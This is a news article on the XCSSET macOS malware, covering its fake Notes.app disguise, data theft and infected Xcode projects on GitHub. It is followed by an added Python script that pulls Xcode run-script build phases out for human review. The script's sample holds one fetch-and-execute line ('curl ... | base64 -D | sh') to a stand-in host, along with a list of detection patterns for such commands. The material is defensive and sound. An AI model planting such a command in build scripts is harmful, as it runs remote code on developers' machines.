XCSSET malware authors devise new ways to target macOS Monterey devices
SentinelOne security researchers have detailed the methods XCSSET malware authors are using to target macOS Monterey users.
“The malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022,” SentinelOne researchers said.
XCSSET can inject malicious JavaScript into websites viewed in Safari, track Safari browsing activity by dumping cookies, and steal sensitive data from Apple Notes, Telegram, Skype, and WeChat.
A previous report also showed how XCSSET could obtain Full Disk Access, Screen Recording and other TCC privacy permissions without user consent.
“One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run,” the SentinelOne researchers said.
“In the latest version, we also note that XCSSET uses Python to parse and steal data from the user’s (legitimate) Notes.app.”
“XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of Python 2.”
The researchers said the malware continues to evade detection by disguising itself as system software or as Google Chrome browser software.
Trend Micro initially uncovered the XCSSET malware in August 2020.
Although XCSSET has been in the wild for two years, very little is known about the threat actors behind the malware or their targets.
Evidence points to Chinese users being extorted for 200 USDT (Tether) to regain access to their stolen accounts.
Some researchers also observed XCSSET being embedded in Xcode projects in GitHub repositories.
It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affected https://t.co/EmutE0jCbD
— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021
“At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users,” the researchers said.
“It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers.”
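The infected repositories described above are Xcode projects, and earlier public analysis of XCSSET described it spreading through shell scripts injected into a project's build phases. The practical check before building anything cloned from an untrusted repository is therefore to read its run-script phases first. The following is an added example, not SentinelOne's, Trend Micro's or the article's own code: it parses Xcode's project.pbxproj text for PBXShellScriptBuildPhase entries, decodes each script, and lists the things a reviewer should look at. The sample project text and the hint patterns are constructed for illustration and are assumptions, not indicators published for XCSSET.

```python
"""Pre-build review of Xcode run-script build phases.
Added example, not SentinelOne's or Trend Micro's code. Assumes Xcode's
project.pbxproj layout (objects keyed by 24-hex-digit ids, an `isa` field,
double-quoted strings with backslash escapes). Sample text and hint
patterns are constructed for illustration."""
import re

# `<24-hex id> /* comment */ = {` opens one entry of the `objects` dict.
_OBJ_RE = re.compile(r'(?<![0-9A-Fa-f])(?P<id>[0-9A-Fa-f]{24})(?![0-9A-Fa-f])\s*'
                     r'(?:/\*(?P<comment>(?:(?!\*/).)*?)\*/)?\s*=\s*\{', re.S)
_ESCAPES = {'n': '\n', 't': '\t', 'r': '\r'}  # \" and \\ decode to themselves

def _skip_string(text, i):
    """`i` is at an opening quote; return the index just past the closing one."""
    i += 1
    while i < len(text):
        if text[i] == '\\':
            i += 2
        elif text[i] == '"':
            return i + 1
        else:
            i += 1
    raise ValueError('unterminated string')

def _object_body(text, start):
    """Text between the `{` at `start` and its matching `}`; braces inside
    quoted strings (e.g. ${SRCROOT}) and /* comments */ do not count."""
    depth, i = 0, start
    while i < len(text):
        if text[i] == '"':
            i = _skip_string(text, i)
            continue
        if text.startswith('/*', i):
            i = text.index('*/', i) + 2
            continue
        depth += {'{': 1, '}': -1}.get(text[i], 0)  # +1 on '{', -1 on '}'
        if depth == 0:
            return text[start + 1:i]
        i += 1
    raise ValueError('unbalanced braces')

def _unquote(s):
    """Decode the backslash escapes of a pbxproj double-quoted string."""
    return re.sub(r'\\(.)', lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)

def _field(body, key):
    """Value of the `key = value;` line in an object body, strings decoded."""
    m = re.search(r'^\s*' + re.escape(key) + r'\s*=\s*', body, re.M)
    if not m:
        return None
    i = m.end()
    if body[i] == '"':
        return _unquote(body[i + 1:_skip_string(body, i) - 1])
    return body[i:body.index(';', i)].strip()

def extract_run_scripts(pbxproj_text):
    """Every PBXShellScriptBuildPhase as {id, name, shell, script}."""
    phases = []
    for m in _OBJ_RE.finditer(pbxproj_text):
        body = _object_body(pbxproj_text, m.end() - 1)
        if _field(body, 'isa') != 'PBXShellScriptBuildPhase':
            continue
        phases.append({'id': m.group('id'),
                       'name': _field(body, 'name') or (m.group('comment') or '').strip(),
                       'shell': _field(body, 'shellPath') or '/bin/sh',
                       'script': _field(body, 'shellScript') or ''})
    return phases

# Prompts for a human reviewer, not verdicts: legitimate projects also fetch
# tooling or call Python from run scripts.
_HINTS = [(r'\b(curl|wget)\b', 'downloads content at build time'),
          (r'\|\s*(sh|bash|zsh)\b', 'pipes data into a shell'),
          (r'\bbase64\s+(-d|-D|--decode)\b', 'decodes a base64 blob'),
          (r'\bosascript\b', 'runs AppleScript'),
          (r'\beval\b', 'evaluates dynamically built commands'),
          (r'\b(xxd\s+-r|openssl\s+enc)\b', 'unpacks encoded or encrypted data'),
          (r'\bpython[23]?\b', 'invokes Python')]

def review_hints(script):
    return [why for pat, why in _HINTS if re.search(pat, script)]

# Constructed sample: a benign lint phase and one that should stop the
# build until somebody reads it.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    archiveVersion = 1;
    objects = {
        1A2B3C4D5E6F708192A3B4C5 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Lint";
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint --path \"${SRCROOT}\"; fi\n";
        };
        2B3C4D5E6F708192A3B4C5D6 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "curl -fsSL https://example.invalid/setup | base64 -D | sh\n";
        };
    };
    rootObject = 3C4D5E6F708192A3B4C5D6E7 /* Project object */;
}
'''

if __name__ == '__main__':
    for phase in extract_run_scripts(SAMPLE_PBXPROJ):
        print(phase['id'], phase['name'], review_hints(phase['script']) or 'no hints')
        print('   ', phase['script'].strip())
```

For a real checkout, pass the contents of Foo.xcodeproj/project.pbxproj to extract_run_scripts and read every script it returns; a phase that downloads something and pipes it into a shell is not proof of XCSSET, but it is the point at which to stop and read before pressing Build. Xcode also runs shell from scheme pre- and post-actions and from Swift package plugins, which this check does not cover.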